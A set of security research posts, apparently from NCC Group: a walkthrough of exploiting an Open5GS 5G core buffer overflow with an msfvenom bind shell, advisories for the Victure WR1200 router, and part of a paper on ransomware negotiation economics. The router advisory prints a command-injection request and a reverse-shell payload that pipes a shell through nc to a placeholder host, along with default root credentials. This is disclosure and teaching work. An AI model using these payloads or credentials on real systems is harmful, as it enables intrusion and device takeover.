• Ubuntu 20.04 VM – Host for Open5GS
• Kali Linux 2021.1 VM – Tools for exploit development
• MsfVenom – Metasploit standalone payload generator
• Msf-pattern_create – Unique string pattern generator
• Msf-pattern_offset – Finds substring in string generated by msf-pattern_create
• GDB Debugger – For examining the execution
• Visual Code – Source code editor
• Netcat – To test the exploit

In the past low-level knowledge of assembler was often required to write the exploit, but with the advent of tools such as MsfVenom, generating exploit code is now ridiculously easy. However, there are still instances where custom shell code is required to develop a working exploit, for example if space is limited.

Where to Start?

First, we need to find exactly where the buffer overflow occurs and why.  This stage has already been covered so please refer to the previous blog post ‘The Challenges of Fuzzing 5G Protocols’ for more details.

For a quick recap we have a buffer created on the stack called ‘dnn’ which is defined as 100 bytes long.

This buffer is passed into the function ‘ogs_fqdn_parse’ as a pointer along with the source data buffer (message->pdi.network_instance.data) containing the value of ‘internet’ which is 8 bytes long (message->pdi.network_instance.len).

When the ‘ogs_fqdn_parse’ function executes, the memcpy copies data from the source to the destination overflowing the destination buffer by 5 bytes in this example.  By reviewing the source code, we can see that we have control over the contents of the ‘src’ parameter and the ‘length’ parameter.  Also note that we have read beyond the end of the ‘src’ buffer which could be used to leak information, but that’s a different type of bug that we won’t explore here.

On examining the function ‘ogs_fqdn_parse’, it’s possible to see that we can write as much data as we like into the destination buffer.  The only issue we face when trying to insert assembly code is the insertion of ‘.’ character or the null termination byte after the memcpy at line 302 and 304 above.

So, although we can write as much data as we want, we are limited to how much code can be inserted if we want to keep this example as simple as possible.  As the variable ‘len’ is an unsigned byte the maximum number of bytes for assembly code is limited to 255 bytes.  We could of course write some custom assembly code to jump over the ‘.’ characters but this adds extra complication.

Before rushing off to code our exploit, it is always worth looking at the other places this function is used as there may be a better opportunity to exploit the bug.  So lets search the source code for other calls to ‘ogs_fqdn_parse’.

As we can see this function is used by several other components in the 5G core which could also be potential targets.  This opens up the attack vectors as we now have potentially multiple 5G core components that can be exploited in a similar fashion.  While the fuzzer only found a single bug in one component (in this case the UPF), examining the code shows that other components such as the AMF, MME, SMF, SGWC may be susceptible to the same issue.  This also highlights that fuzz testing alone will not necessarily find all vulnerabilities, in this example we fuzzed the AMF, MME and failed to discover the same bug.

It is worth pointing out that some of these other calls are not exploitable due to size checks before the call to ‘ogs_fqdn_parse’.  For example, in the following code, the function ‘ogs_nas_5gs_decode_dnn’ the size of the input data is checked against the size of the data structure ‘ogs_nas_dnn_t’ on line 122 below.  This prevents the function ‘ogs_fqdn_parse’ from being called if the input data is larger than the destination structure, which prevents the stack from being corrupted.

For our example exploit we will continue to use the original location of the buffer overflow discovered by our fuzzer.  The function ‘ogs_pfcp_handle_create_pdr’ which is called when the UPF processes a PFCP Session Establishment Request message.

Proof of Concept

To demonstrate the exploit, it is easier to create a simple test program before attempting to exploit the actual component where the stack may be more complicated.

The code below shows a simple test program structured similar to how the function is called in the actual UPF application.  Initially we want to determine the offset on the stack of the function return address for the function ‘test’ in our example.

This simple test program creates a variable ‘dnn’ on the stack along with a unique string of characters for the ‘name’ variable.  The function ‘ogs_fqdn_parse’ is then called to cause the stack corruption and overwrite the return address of the ‘test’ function.  This should cause the test program to crash as the value written to the return address is unlikely to be a valid memory address.

Generating the data for the name variable is done by using the Metasploit Framework tool ‘pattern_create.rb’.  This generates a unique sequence of characters that can later be used to find the relevant offset for the return address.

Command to generate unique string of characters:
$/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000 The function ‘ogs_fqdn_parse’ is expecting the data to start with a single byte indicating the length of the data to follow. To copy the 1000 bytes of data that has been generated onto the stack, we need to split it up and specify the relevant sizes in bytes. Before we can run the program, we need to switch off ASLR (Address Space Layout Randomization). $ sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space"

Then enable unlimited file size for core files.

$ulimit -c unlimited If we compile the test application and run it, we get the following output: $ cc -g test_stack.c -o test_stack

$./test_stack dnn address: 0x7fffffffdfb0 zsh: segmentation fault (core dumped) ./test_stack  As expected, the program crashed because we wrote 1000 bytes of data over important stack variables required for normal program execution. The observant amongst you will have realized that we actually wrote 1010 bytes to the stack, but we will come back to that later. So now we have run the test program and it has generated a core file, it’s now time to examine the crash and find the offset to the magic return address. We will now examine the core file using the debugger gdb. Using the following command let’s load the core file with gdb so we can examine it: $ gdb ./test_stack --core=core

The following image shows the stack layout before the memcpy is executed.  Looking at the layout we should only need to write approximately 116 bytes to overwrite the return address, so writing 1000 bytes is a bit of an over kill for the proof of concept.  However, the stack in the UPF may have more variables between the variable ‘dnn’ and the return address which may require us to write a reasonable amount of data to the stack before we reach the location of the return address we are trying to change.

All we need to do now is use another Metasploit Framework tool called ‘pattern_offset.rb’ to calculate the offset of the return address.  To do this we take the address stored in the saved RIP register associated with the function ‘test’ stack frame (i.e. 0x4131654130654139), and use it as the query parameter for ‘pattern_offset.rb’.

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x4131654130654139 [*] Exact match at offset 119  An exact match is found at offset 119. We need to be careful here as this is not the actual offset of the return address. 119 is the offset of part of our string from the beginning of our unique string. As mentioned earlier we actually wrote 1010 bytes to the stack, which we now need to consider when calculating the final offset of the return address. We can check this by displaying the first 128 bytes of the stack variable ‘dnn’ in our example program. Using the following command in the debugger to show the contents of ‘dnn’ (gdb) x/128bb dnn  Note there is a gap between the end of the ‘dnn’ variable and the frame pointer which is due to 16-byte alignment requirements. Creating the Exploit This is where in the good old days you would crack open the ‘64-IA-32 Architectures Software Developer Instruction Set Reference Manual[2]’ and start hand crafting some assembly code. Fortunately, these days the Metasploit Framework has made this task very simple indeed. The Metasploit Framework tool ‘MsfVenom’ can generate a number of different payloads/exploits by simply providing a few command line options. We have chosen the payload ‘linux/x64/shell_bind_tcp’ which generates code to start a shell prompt when a connection is made to the specified port 5600. The option to append code to exit the program has also been included. The ‘-f’ option is used to generate C code. As we can see from the output of ‘MsfVenom’, the payload is conveniently only 94 bytes long. This means that we can copy it directly to the stack without worrying about the ‘.’ or null character messing up our assembly code. If the payload was longer than 255 bytes (the maximum size of a chunk we can copy) we would need to write some custom assembly code to skip over the ‘.’ character that is inserted after each chunk of data is copied. If we now replace the unique ASCII string in our test program with the output from ‘MsfVenom’ and the return address, we should have a working exploit! Exploiting the UPF Component Now we have a working proof of concept we know our exploit works. All we need to do now is repeat the process of finding the return address when returning from the function ‘ogs_pfcp_handle_create_pdr’, calculate the offset of the ‘dnn’ buffer and finally create a suitable PFCP Session Establish Request message to send the exploit to the UPF. Sounds straightforward enough, however the reality is a little more complicated. To start with the function ‘ogs_pfcp_handle_create_pdr’ is a bit more complicated than our simple ‘test’ function. From the point where we overflow the stack variable ‘dnn’, we need execution to continue until the end of the function ‘ogs_pfcp_handle_create_pdr’ for our exploit code to be executed. As there are several other function calls and variable assignments, we need these to complete without crashing the UPF. The main problem we have is the variable ‘pdr’ which is a pointer on the stack. This will be overwritten when we overwrite the return address because it is at a higher address on the stack compared to the ‘dnn’ variable. To fix this we need to find the offset of the variable ‘pdr’ and assign it to something sensible when we overflow the variable ‘dnn’. We can use the Metasploit tools ‘pattern_create.rb’ and ‘pattern_offset.rb’ again to determine this offset. Once the variable ‘pdr’ has been fixed up, the function then executes to completion and returns, executing our exploit code. The value of ‘pdr’ is at a fixed offset in our example as we have disabled ASLR. This means that we can hard code the value in our exploit once we have calculated it. To create the PFCP Session Establish Request message we used Fuzzowski 5GC and set the Network Instance Information Element to contain our exploit code. We then tested the exploit by using Fuzzowski 5GC to send the PFCP messages to the UPF. After successful testing of the exploit, we used the POC (Proof of Concept) feature of Fuzzowski 5GC to generate a standalone python exploit script. This saves a lot of time compared to hand crafting the messages and having to calculate nested length fields and checksums etc. Below is a section of the PFCP Session Establish Request message containing our exploit, the ‘pdr’ pointer fix and the return address. Mitigations To simplify this blog post and hopefully make it understandable to a wider audience, the standard mitigations that help prevent these kinds of bugs being exploited have been disabled. This enabled a much simpler exploit process to be followed, allowing us to demonstrate the potential damage that can be done by exploiting buffer overflows. The following mitigations would make the demonstrated exploit much harder, but not necessarily impossible to exploit. • ASLR – Address Space Layout Randomization • Stack protection • Stack execution prevention ASLR – Address Space Layout Randomization Randomizing the loading address of various parts of an application make it difficult for an attacker to locate parts of the application they want to target. For example, most operating systems implement some form of ASLR which changes the address of things such as the stack, heap, and library modules. Generally, applications need to be compiled with support for ASLR. Stack Protection By enabling stack protection options during compilation of an application, extra code can be inserted before and after each function in an attempt to detect stack corruption within a function. This may prevent further exploitation to some degree, but it will cause the application to exit which is not necessarily desirable. Stack Execution Prevention By preventing the area of memory that contains the stack from being executable, the type of exploit demonstrated would not be possible. There are however other techniques that can be used to circumvent this protection. Other Mitigations There are several other mitigations that could help prevent this type of bug in the first place. For example: • Better functional/system testing • Better coding standards/practices • Use of more secure versions of functions to replace functions like memcpy • Code reviews • Use of static analysis tools • Fuzz Testing • Design with security in mind The Bug Fix In version 2.3.4 of Open5GS a fix was implemented for our original reported bug (CVE-2021-41794). While this patch fixed the reported bug there are still issues with the function ‘ogs_fqdn_parse’. As the src‘ buffer is effectively controlled by the attacker the above issues are possible depending upon how the function ‘ogs_fqdn_parse‘ is called. If size checks have been done before calling the function, then it’s not so much of an issue, however it is asking for trouble to have the user of the function validating what’s passed in to prevent the buffer overflow. The current patch in version 2.3.4 is susceptible to the second issue of writing a null byte beyond the end of the destination buffer. This just highlights the importance of using all possible mitigations to avoid releasing vulnerable code in the first place. The original PFCP bug (CVE-2021-41794) was concerned with the calculation of the ‘len‘ variable at line 328 above, and its use in the memcpy at line 334 without being validated. The expectation was for the function ‘ogs_fqdn_parse‘ to be completely rewritten instead of an ‘if‘ statement being added to only fix the original bug. Although reading beyond the length of the ‘src‘ variable requires a coding error in the calling function, the one byte buffer overflow can be caused by data passed in by an attacker. • 01/11/2021 – Notified Open5GS of issues (read beyond ‘src‘ variable and one byte overflow to ‘dst‘ variable) • 06/11/2021 – Requested example packet to cause one byte overflow • 09/11/2021 – Sent example python script and screenshot to demonstrate one byte overflow • 15/11/2021 – Open5GS main branch patched This will be fixed in Open5GS versions released after 2.3.6. However the solution of extending the buffers by one byte is not an ideal fix. We hope this blog post has given you a high level technical insight into the dangers of a simple buffer overflow bug, and how it can potentially be exploited by an attacker! Glossary References How to work with us on Commercial Telecommunications Security Testing NCC Group has performed cybersecurity audits of telecommunications equipment for both small and large enterprises. We have experts in the telecommunications field and work with world-wide operators and vendors on securing their networks. NCC Group regularly undertake assessments of 3G/4G/5G networks as well as providing detailed threat assessments for clients. We have the consultant base who can look at the security threats in detail of your extended enterprise equipment, a mobile messaging platform or perhaps looking in detail at a vendor’s hardware. We work closely with all vendors and have extensive knowledge of each of the major vendor’s equipment. NCC Group is at the forefront of 5G security working with network equipment manufacturers and operators alike. We have the skills and capability to secure your mobile network and provide unique insights into vulnerabilities and exploit vectors used by various attackers. Most recently, we placed first in the 5G Cyber Security Hack 2021 Ericsson challenge in Finland. NCC Group can offer proactive advice, security assurance, incident response services and consultancy services to help meet your security needs. If you are an existing customer, please contact your account manager, otherwise please get in touch with our sales team. NCC Group Research POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides Alex Plaskett presented “Pwning the Windows 10 Kernel with NTFS and WNF” at Power Of Community (POC) on the 11th of November 2021. The abstract of the talk is as follows: A local privilege escalation vulnerability (CVE-2021-31956) 0day was identified as being exploited in the wild by Kaspersky. At the time it affected a broad range of Windows versions (right up to the latest and greatest of Windows 10). With no access to the exploit or details of how it worked other than a vulnerability summary the following plan was enacted: 1. Understand how exploitable the issue was in the presence of features such as the Windows 10 Kernel Heap-Backed Pool (Segment Heap). 2. Determine how the Windows Notification Framework (WNF) could be used to enable novel exploit primitives. 3. Understand the challenges an attacker faces with modern kernel pool exploitation and what factors are in play to reduce reliability and hinder exploitation. 4. Gain insight from this exploit which could be used to enable detection and response by defenders. The talk covers the above key areas and provides a detailed walk through, moving from introducing the subject, all the way up to the knowledge which is needed for both offense and defence on modern Windows versions. The slides for the talk can be downloaded as follows: NCC Group Research Technical Advisory – Multiple Vulnerabilities in Victure WR1200 WiFi Router (CVE-2021-43282, CVE-2021-43283, CVE-2021-43284) Victure’s WR1200 WiFi router, also sometimes referred to as AC1200, was found to have multiple vulnerabilities exposing its owners to potential intrusion in their local WiFi network and complete overtake of the device. Three vulnerabilities were uncovered, with links to the associated technical advisories below: CVE-2021-43283 is a common Remote Code Execution vulnerability which is frequently found in routers implementing a ping/trace feature through their web interface that relies on a call to the ping or trace command made to the underlying router OS. However, here the more interesting vulnerabilities are the 2 others which can easily be chained together to go from opportunistic sniffing of WiFi networks to full compromise of the router: • CVE-2021-43282 allows an attacker to easily guess the default WiFi WPA2 key (if it was not manually changed by the device owner) which in this case would be the last 4 bytes from the MAC address of the router which is advertised by the access point, and can be retrieved by a basic WiFi scan. • CVE-2021-43284 allows any user on the local network to open an SSH connection on the rooter with the default root:admin credentials, and despite the user best efforts to change the default admin account password from the web interface, the password for the root account will not be changed at the same time. While NCC Group was able to get in contact with Victure’s support team and communicate these findings to them, those bugs were left unfixed. After giving a reasonable amount of time to Victure to fix these findings according to NCC’s responsible disclosure policies, it was decided to publicly release the following advisories. The disclosure timeline can be found at the bottom of this page. Technical Advisories: Default WiFi Network Password Advertised by Victure WR1200 WiFi router MAC address (CVE-2021-43282) Vendor: Victure Vendor URL: https://www.govicture.com Versions affected: All versions up to and including 1.0.3 Systems Affected: WR1200 Author: Nicolas Bidron CVE Identifier: CVE-2021-43282 Severity: High 8.1 (CVSS v3.1 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) Summary Victure’s WR1200 WiFi router is a general consumer WiFi router with an integrated web interface for configuration. It was found that the default password for the two WiFi networks is advertised to unauthenticated users within WiFi range. Impact The device default WiFi password for both 2.4GHz and 5GHz networks can be trivially guessed by an attacker within range of the WiFi network, allowing the attacker to gain complete access to these networks if the password has been left unchanged from it’s factory default. Details The device default WiFi password corresponds to the last 4 bytes of the MAC address of it’s 2.4GHz network interface controller (NIC). An attacker within scanning range of the WiFi network can thus scan for WiFi networks with the following command.  iwlist wlp1s0 scanning | egrep "Victure" -B 5
Channel:11
Frequency:2.462 GHz (Channel 11)
Quality=68/70  Signal level=-42 dBm
Encryption key:on
ESSID:"Victure-1CC5"
--
Channel:157
Frequency:5.785 GHz
Quality=49/70  Signal level=-61 dBm
Encryption key:on
ESSID:"Victure-1CC5-5G"

The attacker can then effectively guess the correct default password from the last 4 bytes of the MAC address 46:FD:1C:C5 -> password: 46fd1cc5

Recommendation

• Change the WPA key for both 2.4GHz and 5GHz WiFi networks through the router’s web interface

OS Command Injection in Victure WR1200 WiFi router (CVE-2021-43283)

Vendor: Victure
Vendor URL: https://www.govicture.com
Versions affected: All versions up to and including 1.0.3
Systems Affected: WR1200
Author: Nicolas Bidron
CVE Identifier: CVE-2021-43283
Severity: High Medium 6.8 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

Summary

Victure’s WR1200 WiFi router is a general consumer WiFi router with an integrated web interface for configuration. It was found that an attacker can inject shell commands through one the forms on the web interface of the device.

Impact

A command injection vulnerability was found within the web interface of the device allowing an attacker with valid credentials to inject arbitrary shell commands to be executed by the device with root privileges. An attacker would thus be able to use this vulnerability to open a reverse shell on the device with root privileges.

Details

The “ping/traceroute” feature found under the Advanced/System Management portion of the web interface asks the user to enter an IP address to then perform a ping against that IP. By appending a semicolon ; to the domain field of the request, the attacker can successfully inject a command to be executed by the device.

e.g.:

request:

POST /cgi-bin/luci/;stok=REDACTED/admin/opsw/ping_tracert_apply HTTP/1.1
Host: 192.168.16.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://192.168.16.1
Connection: close

{"type":"setmonitor","kind":"ping","domain":"127.0.0.1; echo vulnerable"}

response:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Cache-Control: no-cache
Expires: 0
Content-Length: 25

{"result":0, "msg":"..."}

The attacker can then attempt retrieving the result of the last command executed by using the following request.

request:

GET /cgi-bin/luci/;stok=REDACTED/admin/opsw/ping_tracert HTTP/1.1
Host: 192.168.16.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: sysauth=REDACTED

response:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Cache-Control: no-cache
Expires: 0
Content-Length: 45

{ "info": "vulnerable -c 4", "finish": 0 }

The following payload fed into the domain field can be used to open a reverse shell on any reacheable host on the WAN or LAN network.

127.0.0.1 -c 1 ;rm /a;mkfifo /a;cat /tmp/a|/bin/sh -i 2>&1|nc X.X.X.X 1111 >/a;echo reverse_shell

Replace X.X.X.X in the above command by the IP address of an host waiting for an incoming connection. On the receiving host, apply an adequate firewall rule allowing incoming traffic on port 1111 and issue the following command to wait for the incoming connection from the router:

netcat -l -p 1111

Recommendation

This issue will remain exploitable to authenticated users as long as the Vendor doesn’t fix it through a new router firmware update.

Root SSH Access Enabled with Default Password on Victure WR1200 WiFi Router (CVE-2021-43284)

Vendor: Victure
Vendor URL: https://www.govicture.com
Versions affected: All versions up to and including 1.0.3
Systems Affected: WR1200
Author: Nicolas Bidron
CVE Identifier: CVE-2021-43284
Severity: High 8.8 (CVSS v3.1 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Summary

Victure’s WR1200 WiFi router is a general consumer WiFi router with an integrated web interface for configuration. It was found that the device offers SSH access on the local network which for some of the accounts uses default password that are not changeable through the web interface.

Impact

An attacker with access to the local network can gain access with elevated privileges on the device through SSH even in cases where the admin password was successfully updated through the web interface.

Details

The device allows SSH access from its Local Network (WiFi and ethernet) for 2 distincts users: admin, root. The admin’s SSH password matches the password set for the admin user on the web interface. The root’s SSH password never gets updated from its default value of “admin”. This leaves an attacker able to gain control of the device through SSH whether the admin password was changed on the web interface or not.

Recommendation

Ensure the admin’s default password is changed through the web interface. Also change the root account default password by logging in as root on the router through SSH in the following manner:

ssh [email protected]
>passwd

Disclosure Timeline:

January 26th 2021: Initial email form NCC to Victure announcing to vendor vulnerabilities were found in one of their device.

January 27th - February 2nd 2021: multiple emails between Victure and NCC to agree on a secure method to deliver the vulnerabilities write-ups to Victure.

February 2nd 2021: Write-ups transmitted to Victure's representative through a verified Whatsapp chat session. Victure's representative then initiated a conversation between the software maintainer and NCC through Skype

Februrary 3rd 2021: the software maintainer on Skype acknowledged receipts of the bugs write-ups.

October 12th 2021: NCC reached out to Victure again (not having heard from them since Februrary 3rd 2021) to inform of intent to publicly disclose the bugs unless they can confirm they have a planned fix release within the next 30 days.

As of publishing date of this Technical Advisory, no further communication from Victure was received since Februray 3rd 2021.

Thanks to

Jennifer Fernick and Aaron Haymore for their support throughout the research and disclosure process.

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  11/12/2021
Written by: Nicolas Bidron

NCC Group Research

“We wait, because we know you.” Inside the ransomware negotiation economics.

Pepijn Hack, Cybersecurity Analyst, Fox-IT, part of NCC Group

Zong-Yu Wu, Threat Analyst, Fox-IT, part of NCC Group

Abstract

Organizations worldwide continue to face waves of digital extortion in the form of targeted ransomware. Digital extortion is now classified as the most prominent form of cybercrime and the most devastating and pervasive threat to functioning IT environments. Currently, research on targeted ransomware activity primarily looks at how these attacks are carried out from a technical perspective. However, little research has focused on the economics behind digital extortions and digital extortion negotiation strategies using empirical methods. This research paper explores three main topics. First, can we explain how adversaries use economic models to maximize their profits? Second, what does this tell us about the position of the victim during the negotiation phase? And third, what strategies can ransomware victims leverage to even the playing field? To answer these questions, over seven hundred attacker-victim negotiations, between 2019 and 2020, were collected and bundled into a dataset. This dataset was subsequently analysed using both quantitative and qualitative methods. Analysis of the final ransom agreement reveals that adversaries already know how much victims will  end up paying, before the negotiations have even started. Each ransomware gang has created their own negotiation and pricing strategies meant to maximize their profits. We provide multiple (counter-)strategies which can be used by the victims to obtain a more favourable outcome. These strategies are developed from negotiation failures and successes derived from the cases we have analysed, and are accompanied by examples and quotes from actual conversations between ransomware gangs and their victims. When a ransomware attack hits a company, they find themselves in the middle of an unknown situation. One thing that makes those more manageable is to have as much information as possible. We aim to provide victims with some practical tips they can use when they find themselves in the middle of that crisis.

Introduction

It is 1:30 on a Saturday morning. You just went to bed exhausted after a week of demanding work, but your phone is ringing, nudging you to wake up. It is your IT department on the line telling you to come to the office right now. Your company got hacked and all off the important data is encrypted, including the backup storage. The head of your IT department informs you it is a kind of virus called ransomware. After two long hours of phone calls, you have assembled a crisis management team and you open the ransom note. It  redirects you to a TOR website  where you can chat with the adversaries who hacked your company. Their demand is 3.5 million US dollars in cryptocurrency. You get a sinking feeling in your stomach. You have spent years building this company from the ground. You hired all employees yourself, and know every single one of them by name. You start to realise that the weekend you planned away with your wife and kids is going to have to be cancelled. You need to be there now for your company. For all the families of the people that work for you. You open the chat and start typing. But after telling them you need more time to even start thinking about making a payment, all they respond with is – “We wait.”

After the adversary encrypts and exfiltrates the selected data, he sets an initial ransom demand. If the victim decides to engage in negotiation, both sides will try to reach an agreement on the final amount. With this research we wanted to investigate the phenomenon of ransomware negotiations. How do adversaries set the price of their ransom demand? What could be the final price adversaries would accept? How does the difference in information about each other impact the negotiation process? What does this tell us about paying or not paying the ransom? If companies do end up paying, are there strategies that the companies can utilize to lower the ransom demand?

We made use of both quantitative as well as qualitative research methods to answer these research questions. There have been some earlier reports and blog posts from security companies or news agencies on this topic. However, this research  is mainly based on empirical approaches. We have used our own data, gathered from more than seven hundred negotiations between threat actors and victims. Using this data, we provide information and practical tips to victims who need it the most.

There is a negative sentiment in our society towards paying or negotiating with criminals, and the legitimacy and ethics of it are also questionable to say the least. Nonetheless, we realise that a significant percentage of companies currently do end up paying the ransom demand. Our research demonstrates that the adversaries have a significant upper hand in the negotiation process They often know how much a victim would pay in the end, providing them a comfortable vantage point in the negotiations. We hope to achieve the following twofold goal with our research: firstly, we discourage the victims from engaging with the adversary. However, should there be no choice to negotiate, the second half of our paper provides tips on how to do so successfully.

The paper is structured in the following order. First, we start  with modelling how adversaries are able to use price discrimination to maximize their profit. Then, we use our data to support our hypothesis on the information asymmetry during negotiation. In the second part of the paper, we dig deeper into the negotiation process. We give some practical tips and look at strategies that can be used during the negotiation phase. In the final paragraphs we summarize our findings and look ahead to the future on how we should deal with ransomware not just as individuals but as a society.

The paper is structured in two parts. The first half starts with providing a short background in how ransomware as a service developed and its economy, and goes on modelling how adversaries are able to use price discrimination to maximize the profit. We transition into illustrating the information asymmetry between the victims of the ransomware attack and the attackers themselves using our datasets. The second half digs deeper into the negotiation process, and provides practical tips and strategies that can be used during the negotiation phase, should it prove to be unavoidable. In the final paragraphs, we summarize our findings and explore the future possibilities of how to deal with the phenomenon of ransomware, not only as individuals under attack, but as society as a whole.

Data Collection

In this research, we primarily focused on two different ransomware strains. The first dataset was collected in 2019. This was a period in time when targeted ransomware attacks were upcoming and only a handful of groups were engaged in this business model. At that time, the adversaries were relatively inexperienced and ransom demands were lower compared to today’s ransom amounts. The second dataset was collected in the late 2020s and through the first couple of months in 2021. At this time, ransomware attacks have become a major threat to companies worldwide. Not only has the maturity of the operation been improved, but there has also been an underground market shift to targeting big and profitable enterprises. The owners of the second ransomware strain specifically positioned themselves in the market to only target big and profitable enterprises. The first dataset consists of 681 negotiations, and the second dataset consists of 30 negotiations between the victim and the ransomware group. Due to the sensitive nature of our data, we cannot share further details as we have an obligation to protect our sources.

Ransomware Economics

As most adversaries have claimed, ransomware attacks are nothing but business. Ransomware groups try to achieve the highest possible profits. That is their primary motivation. In this section, we try to model the factors on how the adversaries make decision for profit making. The model is  somewhat rudimentary, but can be used to explain key factors which impact the decision making of the adversaries and as well as their victims.

Hernandez-Castro, et al. [5] explain their hypothesis in their paper “Economic Analysis of Ransomware” and used small scale surveys to get some preliminary results. Based on their model, which we have updated, our research goes beyond this and tests our hypothesis based on actual ransomware negotiation cases.

First and the most importantly, the total profit is not only influenced by the amount of ransom they demand from the victim. It also depends on  whether the victim decides to pay, and the costs of the operation. Instead of studying a single ransom gain, the total profit throughout a series of attacks should be taken into consideration. Take two examples, an organised cybercrime group which only hunts for big targets and asked for millions of dollars but only 5% of the victims paid. We compare this with another group which only asks for ten thousand dollars but 20% of the victims paid. Evidently, these two business strategies lead to different profit gains. Furthermore, the cost for operating a  criminal operation should be included in the calculation. We use the following formula to calculate the overall profit from adversary’s perspective.

We describe P as the total profit taken by the criminal from N number of victims.

•  ri is the final ransomware demand on case .
•  li is the percentage left after exchanging the cryptocurrency to “clean” currencies.
•  mi is the percentage left after paying the commission fee for the RaaS platform. This fee depends on the rules of the RaaS platform and the total ransom. It could cost from 10 to 30 percentage of the . In some cases, this commission fee is 0 as some adversaries use in-house ransomware tool kits.
• f (i) is the final decision made by the victim on to pay or not.  can either be 0 or 1, with 0 meaning the victim decided not to pay and 1 meaning the victim did pay.
• ci is the cost of carrying out the attack. The detailed explanation can be found in the following paragraph.

Using this formula, we can calculate the adversaries’ profit for N number of victims. Let us assume we have two victims. Therefore, , the ransom demand is $100,000 in bitcoin in both cases (ri) , the exchange cost is 10% (li = 90%), the RaaS fee is 20% (li = 80%) of the ransom. Only the second victim pays, and the cost of carrying out the attack is$50 (ci) .

In the first case the profit is ($100,000 * 0.8 * 0.9) * 0 –$50 = -$50. In the second case the profit is ($100,000 * 0.8 * 0.9) * 1 – $50 =$71,950. The total profit of the ransom attack is $71,950 + (-$50) = $71,900. In reality, each variable in the equation will be larger than the example we have used. However, as you can tell, when an adversary is able to find a sweet spot where profit can be maximized, it can be an incredibly profitable business. On the other hands, if less and less victims decide to pay or the ransom paid was less than the adversaries had expected, it becomes a challenge to keep their business running. The variables affecting the cost of carrying out the attack (ci) can include: • Risk cost: These are the costs of avoiding being held accountable. It might include setting up proxies, hiding human factor evidence and even bribing local authorities. • Penetration cost: It is the cost of accessing the targets’ network. It might include, for example, hiring skilled hackers, buying access to malwares/exploits/distribution services and any other form of illegal access into the targets’ network. If the adversary uses a home brew crypto locker, the cost should be included as well As for the f (i), it is a function which models the decision of paying ransomware or not. Even though in the end it is a binary decision, being either a yes or a no, the major variables affecting this decision can include: • Ethics: There are certain companies who do not cooperate with the adversary whatsoever. • ri : The ransom amount strongly impacts the decision whether or not to pay. • Remediation cost: These are the cost of restoring backups, restarting any services, and compensating affected customers. • Regulation cost: These are the estimated cost of paying the fine for the data breach (like GDPR-fines). Maximise the Profit – Finding Pricing Strategy from the Final Ransom Deal. In the earlier years, groups behind ransomware strains used a uniform pricing strategy, which meant they asked a fixed price after each infection. For example, CryptoLocker demanded a payment of 400 USD or EUR per victim. However, the ecosystem has evolved into multiple extortions with each their own different price discrimination approach. There are three types of classic price discriminations [6]. First-degree Price Discrimination (Personalized Pricing), it is a perfect price discrimination where each consumer gets charged a different price based on their own willingness and ability to pay. Second-degree is, for example, when the buyer gets a discount for bulk purchases. Third-degree Price Discrimination happens when the price depends on personal traits of the consumer such as age, gender etc. In the case of a ransomware attack this could be the size of the company or the number of servers encrypted. We have seen different actors adapting second and third degree of price discriminations on ransom pricing. A Chinese cybercrime group was asking for a relatively high initial price for decrypting less than 10 locked computers, and the price gliding down a slope after a bulk number of decryptor was sold. This is an example of second-degree of price discrimination. On the other hand, based on our data, two groups we looked at were a part of multiple extortion ransomware gangs. They were both using third-degree price discrimination. In our dataset D-first, 17% (N = 116) of the 681 victims group proceeded to pay the ransom, with an average amount of$400,767.05 per victim. Within the total of 116 victims who  paid, the revenue of 32 companies was known by us.

In the above example, the initial ransom price was set according to multiple variables. Finding out how the initial price is set and what it represents is important. However, this is beyond the scope of our research because it is rather difficult to get access to these decision-making processes only residing within a criminal organisation. Thus, we focused on studying only the final ransom deal, which may tell a more accurate story on how the hidden price, or maybe a baseline, is set.

A negotiation starts with an adversary demanding an initial ransom. Then, the victim has the option to ask for a lower price, or what adversaries call a ‘discount’. Both sides offer their ideal price back-and-forth. Intuitively, one would assume that the adversary did not know how much a victim was willing to pay. However, we used a metric: Ransom per annual Revenue (in Million USD)  to demonstrate that the result could  differ from  what our intuition is telling us / what is initially assumed. This ratio tells us how much the victim paid per every million dollars in revenue. To calculate the RoR (Ransom per annual Revenue), we divided the ransomware demand by the annual revenue a company made in the last year before they got attacked.

Interestingly, most of the final negotiated ransom prices fell into a certain margin, but there are also some outliers. We can further divide the victim companies into two categories based on their estimated revenue. D-first-small and D-first-mid represent small (revenue < 100 million USD per year) and medium size (revenue >= 100 million USD per year) companies, respectively.

The results show that the adversaries operating behind the dataset we collected knew how much ransom a victim is willing to pay before the negotiation had started.

Another interesting observation is that smaller companies generally pay more from a RoR point of view. In other words, a smaller company pays less in absolute amount but higher in percentage of their revenue. This observation still follows in the second dataset.

